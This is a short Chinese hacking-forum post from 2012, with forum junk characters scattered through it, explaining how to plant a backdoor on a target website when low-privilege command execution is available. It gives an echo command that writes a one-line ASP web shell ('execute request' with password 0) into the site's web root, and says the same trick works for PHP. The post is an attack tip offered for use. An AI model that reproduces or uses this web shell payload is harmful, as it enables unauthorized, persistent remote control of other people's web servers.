在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。! F* @9 G! \. A; G
* u+ u( w) z2 C$ [! E! L7 B命令格式4 D# J! k: Q( r, E! b% b
( K( T% G% w, |4 h7 L
Echo 语句 >目标站绝对目录6 u' l1 @8 k0 P7 R
2 y" t' S* s5 t3 r3 _
例如: + H% p5 g1 \. i# [( j
H! e& E* |! h1 \! C/ C6 k
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp2 T) M9 T# }2 x4 W) u
7 N3 f9 j6 b& P7 H
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。$ U x! o0 l9 A# T) v" t, P
|
发表于 2012-9-23 14:40:24
收藏
分享
支持
反对